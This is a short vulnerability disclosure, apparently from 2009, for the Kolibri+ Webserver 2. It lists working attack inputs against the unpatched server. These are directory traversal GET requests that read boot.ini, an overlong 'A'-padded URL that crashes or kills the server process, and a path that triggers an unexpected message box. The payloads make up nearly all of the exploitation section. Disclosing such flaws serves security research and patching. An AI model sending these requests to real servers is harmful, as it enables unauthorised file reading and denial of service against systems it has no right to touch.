#############################################################################################
#
#   Name    :   Kolibri+ Webserver 2 , DOS/Crash + Directory Traversal Vulnerability
#   Author  :   Usman Saeed 
#   Company :   Xc0re Security Reasearch Group
#   Date    :   06/09/09
#   Homepage :  http://www.xc0re.net
#		
#############################################################################################


[*] Download Page : http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation : 


  	[Directory Traversal]

GET /../../../../../../../../../boot.ini HTTP/1.0
GET /../../../../../../../../boot.ini HTTP/1.0




	[DOS / CRASH]

("A" x 200; #Late crash)
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


("A" x 250 or more then 250 Bytes ; #Immediate Termination of process)
This can also be used ! /default.asp["A" x 250]


	[Strange Behavior]


"/x/_/c:/boot.ini"
Giving the in the url displays "Not Found" msg on the browser & fires off a meesageBox saying that it cannot find the file specified, on the local GUI ! Although the typical 404 not found message for GET /s HTTP/1.1 is "Not found: /s".And nothing fires off a messagebox in the local GUI.